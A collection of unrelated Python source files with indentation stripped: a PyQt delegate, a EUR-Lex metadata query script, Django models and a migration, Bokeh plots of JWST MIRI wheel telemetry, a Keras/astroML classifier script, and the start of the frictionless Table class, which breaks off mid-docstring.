value = self._factory.getValueFromEditor(editor)
if type(value) == list:
variantList = list()
for item in value:
variantList.append(QtCore.QVariant(item))
variant = QtCore.QVariant.fromList(variantList)
else:
variant = QtCore.QVariant(value)
model.setData(index, variant)
def setEditorData(self, editor, index):
""" L{setEditorData<PyQt4.QtGui.QItemDelegate.setEditorData>} """
pyData = index.model().getModelData(index.row(), index.column())
self._factory.setEditorValue(editor, pyData)
class _PropertyNameValidator(QtGui.QValidator):
""" Custom validator for property name checking. """
def __init__(self, validationFunction, parent=None):
"""
Constructor.
@param validationFunction: Callable function which gets the property name as input and validates it.
@type validationFunction: Callable C{object}
"""
QtGui.QValidator.__init__(self, parent)
self._validationFunction = validationFunction
def validate(self, inputString, position):
""" Overwrites the default implementation. """
result = QtGui.QValidator.Invalid
if self._validationFunction(unicode(inputString)) or len(inputString) == 0:
result = QtGui.QValidator.Acceptable
return (result, position)
|
import argparse
from eurlex2lexparency.celex_manager.eurlex import PreLegalContentXmlDataBase
parser = argparse.ArgumentParser(
description="Queries the Eurlex database for document IDs and stores metadata to a preliminary database"
)
parser.add_argument('--consyear', help='Focus on consolidated versions published at given year.')
parser.add_argument('--consleg', help='Include Celexes for consolidated Versions.', action="store_true")
parser.add_argument('--pre', help='First digit of the celex ID.')
parser.add_argument('--year', help="Specify year of the documents to be queried.")
parser.add_argument('--inter', help='Interfix of the celex ID, specifying the document type.')
parser.add_argument('--number', help='Number of the document.')
parser.add_argument('--resume', help="Resume from previous queries", action="store_true")
args = parser.parse_args()
plcxdb = PreLegalContentXmlDataBase()
if args.consyear is not None:
plcxdb.get_conslegs_from(args.consyear, resume=args.resume)
else:
kwargs = {key: value for key, value in args.__dict__.items() if value is not None}
plcxdb.get_celexes_where(**kwargs)
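# Example invocations (illustrative; the script name and flag values are assumptions):
#   python query_celex_metadata.py --year 2016 --inter R --number 679
#   python query_celex_metadata.py --consyear 2019 --resume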
|
# Wallbox EV module __init__.py
from wallbox.wallbox import Wallbox
from wallbox.statuses import Statuses
|
from django.conf import settings
from django.db import models
from django.db.models import DO_NOTHING
class AuthorizedAgent(models.Model):
authorized = models.BooleanField(default=True)
user = models.OneToOneField(
settings.AUTH_USER_MODEL,
default=None,
blank=True,
null=True,
on_delete=DO_NOTHING,
)
app_name = models.CharField(max_length=200, blank=True, null=True)
app_key = models.TextField(blank=True, null=True)
|
#! /usr/bin/env python
"""Prepares plots for FPE VOLTAGE tab
Module prepares plots for mnemonics below. Combines plots in a grid and
returns tab object.
Plot 1:
IMIR_HK_FW_POS_RATIO_FND
IMIR_HK_FW_POS_RATIO_OPAQUE
IMIR_HK_FW_POS_RATIO_F1000W
IMIR_HK_FW_POS_RATIO_F1130W
IMIR_HK_FW_POS_RATIO_F1280W
IMIR_HK_FW_POS_RATIO_P750L
IMIR_HK_FW_POS_RATIO_F1500W
IMIR_HK_FW_POS_RATIO_F1800W
IMIR_HK_FW_POS_RATIO_F2100W
IMIR_HK_FW_POS_RATIO_F560W
IMIR_HK_FW_POS_RATIO_FLENS
IMIR_HK_FW_POS_RATIO_F2300C
IMIR_HK_FW_POS_RATIO_F770W
IMIR_HK_FW_POS_RATIO_F1550C
IMIR_HK_FW_POS_RATIO_F2550W
IMIR_HK_FW_POS_RATIO_F1140C
IMIR_HK_FW_POS_RATIO_F2550WR
IMIR_HK_FW_POS_RATIO_F1065C
Plot 2:
IMIR_HK_GW14_POS_RATIO_SHORT
IMIR_HK_GW14_POS_RATIO_MEDIUM
IMIR_HK_GW14_POS_RATIO_LONG
Plot 3:
IMIR_HK_GW23_POS_RATIO_SHORT
IMIR_HK_GW23_POS_RATIO_MEDIUM
IMIR_HK_GW23_POS_RATIO_LONG
Plot 4:
IMIR_HK_CCC_POS_RATIO_LOCKED
IMIR_HK_CCC_POS_RATIO_OPEN
IMIR_HK_CCC_POS_RATIO_CLOSED
Authors
-------
- Daniel Kühbacher
Use
---
The functions within this module are intended to be imported and
used by ``dashboard.py``, e.g.:
::
from .plots.wheel_ratio_tab import wheel_ratios
tab = wheel_ratios(conn, start, end)
Dependencies
------------
User must provide database "miri_database.db"
"""
import jwql.instrument_monitors.miri_monitors.data_trending.plots.plot_functions as pf
import jwql.instrument_monitors.miri_monitors.data_trending.utils.mnemonics as mn
from bokeh.plotting import figure
from bokeh.models.widgets import Panel, Div
from bokeh.layouts import column
def gw14(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure(tools="pan,wheel_zoom,box_zoom,reset,save",
toolbar_location="above",
plot_width=1120,
plot_height=500,
y_range=[-2, 2],
x_axis_type='datetime',
output_backend="webgl",
x_axis_label='Date',
y_axis_label='ratio (normalized)')
p.grid.visible = True
p.title.text = "DGA-A Ratio"
p.title.align = "left"
pf.add_basic_layout(p)
pf.add_to_wplot(p, "SHORT", "IMIR_HK_GW14_POS_RATIO_SHORT", start, end, conn, mn.gw14_nominals['SHORT'], color="green")
pf.add_to_wplot(p, "MEDIUM", "IMIR_HK_GW14_POS_RATIO_MEDIUM", start, end, conn, mn.gw14_nominals['MEDIUM'], color="red")
pf.add_to_wplot(p, "LONG", "IMIR_HK_GW14_POS_RATIO_LONG", start, end, conn, mn.gw14_nominals['LONG'], color="blue")
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
def gw23(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure(tools="pan,wheel_zoom,box_zoom,reset,save",
toolbar_location="above",
plot_width=1120,
plot_height=500,
y_range=[-2, 2],
x_axis_type='datetime',
x_axis_label='Date',
y_axis_label='ratio (normalized)')
p.grid.visible = True
p.title.text = "DGA-B Ratio"
p.title.align = "left"
pf.add_basic_layout(p)
pf.add_to_wplot(p, "SHORT", "IMIR_HK_GW23_POS_RATIO_SHORT", start, end, conn, mn.gw23_nominals['SHORT'], color="green")
pf.add_to_wplot(p, "MEDIUM", "IMIR_HK_GW23_POS_RATIO_MEDIUM", start, end, conn, mn.gw23_nominals['MEDIUM'], color="red")
pf.add_to_wplot(p, "LONG", "IMIR_HK_GW23_POS_RATIO_LONG", start, end, conn, mn.gw23_nominals['LONG'], color="blue")
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
def ccc(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure(tools="pan,wheel_zoom,box_zoom,reset,save",
toolbar_location="above",
plot_width=1120,
plot_height=500,
y_range=[-2, 2],
x_axis_type='datetime',
x_axis_label='Date',
y_axis_label='ratio (normalized)')
p.grid.visible = True
p.title.text = "CCC Ratio"
pf.add_basic_layout(p)
# add_to_wplot(p, "LOCKED", "IMIR_HK_CCC_POS_RATIO_LOCKED", start, end, conn, mn.ccc_nominals['LOCKED'], color="green")
pf.add_to_wplot(p, "OPEN", "IMIR_HK_CCC_POS_RATIO_OPEN", start, end, conn, mn.ccc_nominals['OPEN'], color="red")
pf.add_to_wplot(p, "CLOSED", "IMIR_HK_CCC_POS_RATIO_CLOSED", start, end, conn, mn.ccc_nominals['CLOSED'], color="blue")
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
def fw(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure(tools="pan,wheel_zoom,box_zoom,reset,save",
toolbar_location="above",
plot_width=1120,
plot_height=500,
y_range=[-6, 4],
x_axis_type='datetime',
x_axis_label='Date',
y_axis_label='ratio (normalized)')
p.grid.visible = True
p.title.text = "Filterwheel Ratio"
pf.add_basic_layout(p)
pf.add_to_wplot(p, "FND", "IMIR_HK_FW_POS_RATIO_FND", start, end, conn, mn.fw_nominals['FND'], color="green")
pf.add_to_wplot(p, "OPAQUE", "IMIR_HK_FW_POS_RATIO_OPAQUE", start, end, conn, mn.fw_nominals['OPAQUE'], color="red")
pf.add_to_wplot(p, "F1000W", "IMIR_HK_FW_POS_RATIO_F1000W", start, end, conn, mn.fw_nominals['F1000W'], color="blue")
pf.add_to_wplot(p, "F1130W", "IMIR_HK_FW_POS_RATIO_F1130W", start, end, conn, mn.fw_nominals['F1130W'], color="orange")
pf.add_to_wplot(p, "F1280W", "IMIR_HK_FW_POS_RATIO_F1280W", start, end, conn, mn.fw_nominals['F1280W'], color="firebrick")
pf.add_to_wplot(p, "P750L", "IMIR_HK_FW_POS_RATIO_P750L", start, end, conn, mn.fw_nominals['P750L'], color="cyan")
pf.add_to_wplot(p, "F1500W", "IMIR_HK_FW_POS_RATIO_F1500W", start, end, conn, mn.fw_nominals['F1500W'], color="magenta")
pf.add_to_wplot(p, "F1800W", "IMIR_HK_FW_POS_RATIO_F1800W", start, end, conn, mn.fw_nominals['F1800W'], color="burlywood")
pf.add_to_wplot(p, "F2100W", "IMIR_HK_FW_POS_RATIO_F2100W", start, end, conn, mn.fw_nominals['F2100W'], color="cadetblue")
pf.add_to_wplot(p, "F560W", "IMIR_HK_FW_POS_RATIO_F560W", start, end, conn, mn.fw_nominals['F560W'], color="chartreuse")
pf.add_to_wplot(p, "FLENS", "IMIR_HK_FW_POS_RATIO_FLENS", start, end, conn, mn.fw_nominals['FLENS'], color="brown")
pf.add_to_wplot(p, "F2300C", "IMIR_HK_FW_POS_RATIO_F2300C", start, end, conn, mn.fw_nominals['F2300C'], color="chocolate")
pf.add_to_wplot(p, "F770W", "IMIR_HK_FW_POS_RATIO_F770W", start, end, conn, mn.fw_nominals['F770W'], color="darkorange")
pf.add_to_wplot(p, "F1550C", "IMIR_HK_FW_POS_RATIO_F1550C", start, end, conn, mn.fw_nominals['F1550C'], color="darkgreen")
pf.add_to_wplot(p, "F2550W", "IMIR_HK_FW_POS_RATIO_F2550W", start, end, conn, mn.fw_nominals['F2550W'], color="darkcyan")
pf.add_to_wplot(p, "F1140C", "IMIR_HK_FW_POS_RATIO_F1140C", start, end, conn, mn.fw_nominals['F1140C'], color="darkmagenta")
pf.add_to_wplot(p, "F2550WR", "IMIR_HK_FW_POS_RATIO_F2550WR", start, end, conn, mn.fw_nominals['F2550WR'], color="crimson")
pf.add_to_wplot(p, "F1065C", "IMIR_HK_FW_POS_RATIO_F1065C", start, end, conn, mn.fw_nominals['F1065C'], color="cornflowerblue")
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
def wheel_ratios(conn, start, end):
'''Combine plots to a tab
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : tab object
used by dashboard.py to set up dashboard
'''
descr = Div(text=
"""
<style>
table, th, td {
border: 1px solid black;
background-color: #efefef;
border-collapse: collapse;
padding: 5px
}
</style>
<body>
<table style="width:100%">
<tr>
<th><h6>Plotname</h6></th>
<th><h6>Mnemonic</h6></th>
<th><h6>Description</h6></th>
</tr>
<tr>
<td>Filterwheel Ratio</td>
<td>IMIR_HK_FW_POS_RATIO<br>
IMIR_HK_FW_CUR_POS<br></td>
<td>FW position sensor ratio (normalised) and commanded position</td>
</tr>
<tr>
<td>DGA-A Ratio</td>
<td>IMIR_HK_GW14_POS_RATIO<br>
IMIR_HK_GW14_CUR_POS<br></td>
<td>DGA-A position sensor ratio (normalised) and commanded position</td>
</tr>
<tr>
<td>DGA-B Ratio</td>
<td>IMIR_HK_GW23_POS_RATIO<br>
IMIR_HK_GW23_CUR_POS<br></td>
<td>DGA-B position sensor ratio (normalised) and commanded position</td>
</tr>
<tr>
<td>CCC Ratio</td>
<td>IMIR_HK_CCC_POS_RATIO<br>
IMIR_HK_CCC_CUR_POS<br></td>
<td>Contamination Control Cover position sensor ratio (normalised) and commanded position</td>
</tr>
</table>
</body>
""", width=1100)
plot1 = fw(conn, start, end)
plot2 = gw14(conn, start, end)
plot3 = gw23(conn, start, end)
plot4 = ccc(conn, start, end)
layout = column(descr, plot1, plot2, plot3, plot4)
tab = Panel(child=layout, title="WHEEL RATIO")
return tab
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
def forward(apps, schema_editor):
Sponsor = apps.get_model('sponsorship', 'Sponsor')
db_alias = schema_editor.connection.alias
for sponsor in Sponsor.objects.using(db_alias):
# Get web description and set on sponsor
description = sponsor.sponsor_benefits.filter(benefit__name='Company Description').first()
if description:
sponsor.web_description = description.text
logo = sponsor.sponsor_benefits.filter(benefit__name='Web logo').first()
if logo:
sponsor.web_logo = logo.upload
sponsor.save()
def back(apps, schema_editor):
Sponsor = apps.get_model('sponsorship', 'Sponsor')
Benefit = apps.get_model('sponsorship', 'Benefit')
SponsorBenefit = apps.get_model('sponsorship', 'SponsorBenefit')
db_alias = schema_editor.connection.alias
description_benefit = Benefit.objects.get(name='Company Description')
logo_benefit = Benefit.objects.get(name='Web logo')
for sponsor in Sponsor.objects.using(db_alias):
benefit, __ = sponsor.sponsor_benefits.get_or_create(
benefit=description_benefit,
defaults=dict(
active=True
)
)
benefit.text = sponsor.web_description
benefit.save()
benefit, __ = sponsor.sponsor_benefits.get_or_create(
benefit=logo_benefit,
defaults=dict(
active=True
)
)
benefit.upload = sponsor.web_logo
benefit.save()
class Migration(migrations.Migration):
dependencies = [
('sponsorship', '0005_auto_20150721_1445'),
]
operations = [
migrations.RunPython(forward, back),
]
|
from __future__ import print_function # Use a function definition from future version (say 3.x from 2.7 interpreter)
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
import keras
import math
from keras.metrics import categorical_accuracy
from matplotlib.animation import FuncAnimation
from astroML.utils import completeness_contamination
from astroML.utils import split_samples
from scipy.fftpack import fft, ifft
from keras.models import load_model
# Convert integer labels to one-hot format: an array of 0's with a 1 in the position of the desired label, so 9 = [0 0 0 0 0 0 0 0 0 1]
def convertLabels(labels,samplesize,out):
label = np.zeros((samplesize,out),dtype=np.float32)
for i in range(0,len(labels)):
if labels[i] == 0:
label[i,:] = np.array([0,1])
else:
label[i,:] = np.array([1,0])
return label
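# Illustrative check (binary case used here): convertLabels(np.array([0, 1]), 2, 2)
# returns [[0., 1.], [1., 0.]] -- label 0 maps to [0, 1], any other label maps to [1, 0].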
def reBalanceData(x,y,Multip):
ones = x[np.where(y==1)].copy()
y_ones = y[np.where(y==1)].copy()
total = len(y)
total_one = len(ones)
multiplier = int(math.ceil((total/total_one)*Multip))
for i in range(multiplier):
x = np.insert(x,1,ones,axis=0)
y = np.insert(y,1,y_ones,axis=0)
ran = np.arange(x.shape[0])
np.random.shuffle(ran)
x= x[ran]
y= y[ran]
return x,y
def predictionMap(xlim,ylim):
mesh = []
for x in np.arange(xlim[0],xlim[1],0.001):
for y in np.arange(ylim[0],ylim[1],0.001):
mesh.append([x,y,x*x,y*y])
return (np.array(mesh))
def splitdata(X, y, ratio):
# first `ratio` fraction for training, the remainder for testing (no overlap between splits)
split = int(X.shape[0] * ratio)
return X[:split], X[split:], y[:split], y[split:]
def generateData(multi):
X = np.loadtxt('AstroML_Data.txt')
y = np.loadtxt('AstroML_Labels.txt')
ran = np.arange(X.shape[0])
np.random.shuffle(ran)
X= X[ran]
y= y[ran]
X_train, X_test, y_train, y_test = splitdata(X, y,multi)
X_train, y_train = reBalanceData(X_train,y_train,1.0-multi)
np.save('AstroML_X_Train_Shuffle_Split_0_7_Rebalance_1.npy',X_train)
np.save('AstroML_X_Test_Shuffle_Split_0_7.npy',X_test)
np.save('AstroML_Y_Train_Shuffle_Split_0_7_Rebalance_1.npy',y_train)
np.save('AstroML_Y_Test_Shuffle_Split_0_7.npy',y_test)
# rebalance the held-out test split (not the training data) and save with a single .npy extension,
# matching the filenames loaded later in the script
X_test, y_test = reBalanceData(X_test, y_test, 1.0-multi)
np.save('AstroML_X_Test_Shuffle_Split_0_7_Rebalance_1.npy', X_test)
np.save('AstroML_Y_Test_Shuffle_Split_0_7_Rebalance_1.npy', y_test)
def addSquaredColumn(X_train,X_test,X_test_unbalanced):
for i in range(0,4):
X_train=np.append(X_train,np.multiply(X_train[:,[i]],X_train[:,[i]]),axis=1)
X_test=np.append(X_test,np.multiply(X_test[:,[i]],X_test[:,[i]]),axis=1)
X_test_unbalanced=np.append(X_test_unbalanced,np.multiply(X_test_unbalanced[:,[i]],X_test_unbalanced[:,[i]]),axis=1)
return X_train,X_test,X_test_unbalanced
#%%
############################################
#GPU Checking
from tensorflow.python.client import device_lib
print(device_lib.list_local_devices())
sess = tf.Session(config=tf.ConfigProto(log_device_placement=True))
keras.backend.tensorflow_backend._get_available_gpus()
############# Settings #####################
network = [[4,"tanh"],[3,"tanh"],[1,"sigmoid"]]
LR = 0.1
Epochs = 100
BatchSize = int(math.ceil((np.load('AstroML_X_Train_Shuffle_Split_0_7_Rebalance_1.npy').shape[0])))
Multip = 0.7
addMulti = False
#Load old Model (True) Build new (False)
load=False
#############################################################
comp = []
cont = []
color = []
fig = plt.figure(figsize=(15, 15))
fig.subplots_adjust(bottom=0.15, top=0.95, hspace=0.2,left=0.1, right=0.95, wspace=0.2)
for coll in range(2,5):
X = np.loadtxt('AstroML_Data.txt')
y = np.loadtxt('AstroML_Labels.txt')
X_train = np.load('AstroML_X_Train_Shuffle_Split_0_7_Rebalance_1.npy')
X_test = np.load('AstroML_X_Test_Shuffle_Split_0_7_Rebalance_1.npy')
y_train = np.load('AstroML_Y_Train_Shuffle_Split_0_7_Rebalance_1.npy')
y_test = np.load('AstroML_Y_Test_Shuffle_Split_0_7_Rebalance_1.npy')
X_test_unbalanced = np.load('AstroML_X_Test_Shuffle_Split_0_7.npy')
y_test_unbalanced = np.load('AstroML_Y_Test_Shuffle_Split_0_7.npy')
colSort = []
if addMulti == True:
X_train,X_test,X_test_unbalanced = addSquaredColumn(X_train,X_test,X_test_unbalanced)
colSort2 = [1,0,5,4]
colSort3 = [1,0,2,5,4,6]
colSort4 = [1,0,2,3,5,4,6,7]
else:
colSort2 = [1,0]
colSort3 = [1,0,2]
colSort4 = [1,0,2,3]
if coll==2:
X_train = X_train[:, colSort2] # rearrange columns for better 2-color results
X_test = X_test[:, colSort2] # rearrange columns for better 4-color results
X = X[:, colSort2]
X_test_unbalanced = X_test_unbalanced[:, colSort2] # rearrange columns for better 2-color results
elif coll==3:
X_train = X_train[:, colSort3] # rearrange columns for better 3-color results
X_test = X_test[:, colSort3] # rearrange columns for better 4-color results
X = X[:, colSort3]
X_test_unbalanced = X_test_unbalanced[:, colSort3] # rearrange columns for better 2-color results
elif coll==4:
X_train = X_train[:, colSort4] # rearrange columns for better 4-color results
X_test = X_test[:, colSort4] # rearrange columns for better 4-color results
X = X[:, colSort4]
X_test_unbalanced = X_test_unbalanced[:, colSort4] # rearrange columns for better 2-color results
N_tot = y_train.shape[0]
#Total assignments of 0 (Classification = true)
N_st = np.sum(y_train == 0)
#Total assignments of 1 (Classification = false)
N_rr = N_tot - N_st
N_plot = 5000 + N_rr
#%%
###########################################################
############Network Building##############################
if load == True:
# load the previously saved model for this colour count
# (matches model.save('model' + str(coll) + '.h5') at the end of the loop)
model = load_model('model' + str(coll) + '.h5')
else:
layers = []
layers.append(keras.layers.Dense(network[0][0],input_dim=(coll),kernel_initializer='normal', activation=network[0][1]))
for layer in range(1,len(network)):
#Dropout
if network[layer][0] == -1:
layers.append(keras.layers.Dropout(network[layer][1]))
else:
layers.append(keras.layers.Dense(network[layer][0],kernel_initializer='normal', activation=network[layer][1]))
model = keras.Sequential(layers)
###############################
#Training
###############################
model.compile(optimizer=keras.optimizers.Adam(lr=LR), loss='binary_crossentropy', metrics=['binary_accuracy', 'categorical_accuracy'])
history = model.fit(X_train, y_train,validation_data=(X_test,y_test), batch_size=BatchSize,epochs=Epochs, verbose=2)
predictions = np.around(model.predict(X_test_unbalanced).reshape(model.predict(X_test_unbalanced).shape[0],))
completeness, contamination = completeness_contamination(predictions,(y_test_unbalanced))
##############################
#Model Evaluation
##############################
scores = model.evaluate(X_test,y_test)
loss = scores[0]
print("\n%s: %.2f%%" % (model.metrics_names[1], scores[1]*100))
comp.append(completeness)
cont.append(contamination)
color.append(coll)
print("completeness",completeness)
print("contamination", contamination)
loss_data = history.history['loss']
epoch_data = np.arange(0,len((loss_data)))
crossVal = history.history['val_loss']
####################################
#Loss Plotting
####################################
ax_loss = fig.add_subplot(221)
im_loss = ax_loss.plot(epoch_data,np.log(loss_data),'-',label=str(coll+1)+" Colours")
ax_loss.plot(epoch_data,np.log(crossVal),'-',label=str(coll+1)+" Colours Cross Val")
ax_loss.set_ylabel('Log(Loss)')
ax_loss.set_xlabel('Epoch')
ax_loss.legend()
#Save Model
model.save('model'+str(coll)+'.h5')
if coll == 2 :
xlim = (0.7, 1.35)
ylim = (-0.15, 0.4)
#predictions = np.transpose(model.predict(X_train))
test = predictionMap(xlim,ylim)
xshape = int((xlim[1]-xlim[0])*1000)+1
yshape = int((ylim[1]-ylim[0])*1000)
test = test[:,colSort2]
predictions =(model.predict(test))
ax_heat = fig.add_subplot(222)
im_heat = ax_heat.imshow(np.transpose(np.reshape(predictions[:,0],(xshape,yshape))),origin='lower',extent=[xlim[0],xlim[1],ylim[0],ylim[1]])
cb = fig.colorbar(im_heat, ax=ax_heat)
cb.set_label('Classification Probability of Variable Main Sequence Stars.')
ax_heat.set_xlabel('$u-g$')
ax_heat.set_ylabel('$g-r$')
ac_cont = fig.add_subplot(223)
im_cont = ac_cont.scatter(X[-N_plot:, 1],X[-N_plot:, 0], c=y[-N_plot:],s=12, lw=0, cmap=plt.cm.binary, zorder=2)
ac_cont.contour(np.reshape(test[:, 1],(xshape,yshape)), np.reshape(test[:, 0],(xshape,yshape)), np.reshape(predictions,(xshape,yshape)),cmap=plt.cm.binary,lw=2)
im_cont.set_clim(-0.5, 1)
ac_cont.set_xlabel('$u-g$')
ac_cont.set_ylabel('$g-r$')
hiddenLayers = "Input: " + str(coll+1) + " "
hiddenLayers = hiddenLayers + " "+str(network[0][0]) + " (activation = "+str(network[0][1])+") "
for layer in range(1,len(network)):
hiddenLayers = hiddenLayers +str(network[layer][0]) + " (activation = "+str(network[layer][1])+") "
fig.suptitle("Epochs = "+str(Epochs)+" Batch Size = "+str(BatchSize)+", Multi = "+str(Multip)+", Learning Rate = "+str(LR)+ "\n Layers-> " +hiddenLayers +"%s: %.2f%%" % (model.metrics_names[1], scores[1]*100),fontsize=22,y=0.98)
####################
#astroML Data
####################
#compML = np.array([0.68613139])
compML = np.array([0.68613139, 0.81021898, 0.87591241])
contML = np.array([ 0.79295154, 0.80143113, 0.79020979])
#contML = np.array([ 0.79295154])
ax = fig.add_subplot(224)
ax.plot(color, comp, 'o-r', ms=6,label="TensorFlow-Completeness")
ax.plot(color, compML, 'o-k', ms=6,label="Gaussian Naive Bayes-Completeness")
ax.plot(color, cont, 'ro--', ms=6,label="TensorFlow-Contamination")
ax.plot(color, contML, 'ko--', ms=6,label="Gaussian Naive Bayes-Contamination")
ax.xaxis.set_major_locator(plt.MultipleLocator(1))
ax.yaxis.set_major_locator(plt.MultipleLocator(0.2))
ax.xaxis.set_major_formatter(plt.NullFormatter())
ax.legend()
ax.set_ylabel('Completeness/Contamination')
ax.set_xlim(0.5, 4.5)
ax.set_ylim(-0.1, 1.1)
ax.grid(True)
ax.set_xlim([1.5,4.5])
plt.tight_layout()
plt.subplots_adjust(hspace = 0.2,wspace=0.2,top=0.89,bottom=0.05)
plt.show()
|
import typing
from pathlib import Path
from copy import deepcopy
from itertools import chain
from .header import Header
from .schema import Schema
from .system import system
from .file import File
from .row import Row
from . import exceptions
from . import errors
from . import helpers
from . import config
class Table:
"""Table representation
API | Usage
-------- | --------
Public | `from frictionless import Table`
This class is at the heart of the whole Frictionless framework.
It loads a data source, and allows you to stream its parsed contents.
```python
with Table("data/table.csv") as table:
table.header == ["id", "name"]
table.read_rows() == [
{'id': 1, 'name': 'english'},
{'id': 2, 'name': '中国人'},
]
```
Parameters:
source (any): Source of the file; can be in various forms.
Usually, it's a string as `<scheme>://path/to/file.<format>`.
It also can be, for example, an array of data arrays/dictionaries.
scheme? (str): Scheme for loading the file (file, http, ...).
If not set, it'll be inferred from `source`.
format? (str): File source's format (csv, xls, ...).
If not set, it'll be inferred from `source`.
hashing? (str): An algorithm to hash data.
It defaults to 'md5'.
encoding? (str): Source encoding.
If not set, it'll be inferred from `source`.
compression? (str): Source file compression (zip, ...).
If not set, it'll be inferred from `source`.
compression_path? (str): A path within the compressed file.
It defaults to the first file in the archive.
control? (dict|Control): File control.
For more information, please check the Control documentation.
dialect? (dict|Dialect): Table dialect.
For more information, please check the Dialect documentation.
query? (dict|Query): Table query.
For more information, please check the Query documentation.
headers? (int|int[]|[int[], str]): Either a row
number or list of row numbers (in case of multi-line headers) to be
considered as headers (rows start counting at 1), or a pair
where the first element is header rows and the second the
header joiner. It defaults to 1.
schema? (dict|Schema): Table schema.
For more information, please check the Schema documentation.
sync_schema? (bool): Whether to sync the schema.
If it sets to `True` the provided schema will be mapped to
the inferred schema. It means that, for example, you can
provide a subset of fields to be applied on top of the inferred
fields or the provided schema can have different order of fields.
patch_schema? (dict): A dictionary to be used as an inferred schema patch.
The form of this dictionary should follow the Schema descriptor form
except for the `fields` property which should be a mapping with the
key named after a field name and the values being a field patch.
For more information, please check "Extracting Data" guide.
infer_type? (str): Enforce all the inferred types to be this type.
For more information, please check "Describing Data" guide.
infer_names? (str[]): Enforce all the inferred fields to have provided names.
For more information, please check "Describing Data" guide.
infer_volume? (int): The amount of rows to be extracted as a sample.
For more information, please check "Describing Data" guide.
It defaults to 100
infer_confidence? (float): A number from 0 to 1 setting the infer confidence.
If 1 the data is guaranteed to be valid against the inferred schema.
For more information, please check "Describing Data" guide.
It defaults to 0.9
infer_missing_values? (str[]): String to be considered as missing values.
For more information, please check "Describing Data" guide.
It defaults to `['']`
lookup? (dict): The lookup is a special object providing relational information.
For more information, please check "Extracting Data" guide.
"""
# Public
def __init__(
self,
source,
*,
# File
scheme=None,
format=None,
hashing=None,
encoding=None,
compression=None,
compression_path=None,
control=None,
# Table
dialect=None,
query=None,
headers=None,
schema=None,
sync_schema=False,
patch_schema=False,
infer_type=None,
infer_names=None,
infer_volume=config.DEFAULT_INFER_VOLUME,
infer_confidence=config.DEFAULT_INFER_CONFIDENCE,
infer_missing_values=config.DEFAULT_MISSING_VALUES,
lookup=None,
):
# Update source
if isinstance(source, Path):
source = str(source)
# Update dialect
if headers is not None:
dialect = (dialect or {}).copy()
if not headers:
dialect["header"] = False
elif isinstance(headers, int):
dialect["headerRows"] = [headers]
elif isinstance(headers, list):
dialect["headerRows"] = headers
if isinstance(headers[0], list):
dialect["headerRows"] = headers[0]
dialect["headerJoin"] = headers[1]
# Store state
self.__parser = None
self.__sample = None
self.__schema = None
self.__header = None
self.__data_stream = None
self.__row_stream = None
self.__row_number = None
self.__row_position = None
self.__field_positions = None
self.__sample_positions = None
# Store params
self.__init_schema = schema
self.__sync_schema = sync_schema
self.__patch_schema = patch_schema
self.__infer_type = infer_type
self.__infer_names = infer_names
self.__infer_volume = infer_volume
self.__infer_confidence = infer_confidence
self.__infer_missing_values = infer_missing_values
self.__lookup = lookup
# Create file
self.__file = File(
source=source,
scheme=scheme,
format=format,
hashing=hashing,
encoding=encoding,
compression=compression,
compression_path=compression_path,
control=control,
dialect=dialect,
query=query,
)
def __enter__(self):
if self.closed:
self.open()
return self
def __exit__(self, type, value, traceback):
self.close()
def __iter__(self):
self.__read_row_stream_raise_closed()
return iter(self.__row_stream)
@property
def path(self):
"""
Returns:
str: file path
"""
return self.__file.path
@property
def source(self):
"""
Returns:
any: file source
"""
return self.__file.source
@property
def scheme(self):
"""
Returns:
str?: file scheme
"""
return self.__file.scheme
@property
def format(self):
"""
Returns:
str?: file format
"""
return self.__file.format
@property
def hashing(self):
"""
Returns:
str?: file hashing
"""
return self.__file.hashing
@property
def encoding(self):
"""
Returns:
str?: file encoding
"""
return self.__file.encoding
@property
def compression(self):
"""
Returns:
str?: file compression
"""
return self.__file.compression
@property
def compression_path(self):
"""
Returns:
str?: file compression path
"""
return self.__file.compression_path
@property
def control(self):
"""
Returns:
Control?: file control
"""
return self.__file.control
@property
def query(self):
"""
Returns:
Query?: table query
"""
return self.__file.query
@property
def dialect(self):
"""
Returns:
Dialect?: table dialect
"""
return self.__file.dialect
@property
def schema(self):
"""
Returns:
Schema?: table schema
"""
return self.__schema
@property
def header(self):
"""
Returns:
str[]?: table header
"""
return self.__header
@property
def sample(self):
"""Tables's rows used as sample.
These sample rows are used internally to infer characteristics of the
source file (e.g. schema, ...).
Returns:
list[]?: table sample
"""
return self.__sample
@property
def stats(self):
"""Table stats
The stats object has:
- hash: str - hashing sum
- bytes: int - number of bytes
- rows: int - number of rows
Returns:
dict?: table stats
"""
return self.__file.stats
@property
def data_stream(self):
"""Data stream in form of a generator of data arrays
Yields:
any[][]?: data stream
"""
return self.__data_stream
@property
def row_stream(self):
"""Row stream in form of a generator of Row objects
Yields:
Row[][]?: row stream
"""
return self.__row_stream
# Open/Close
def open(self):
"""Open the table as "io.open" does
Raises:
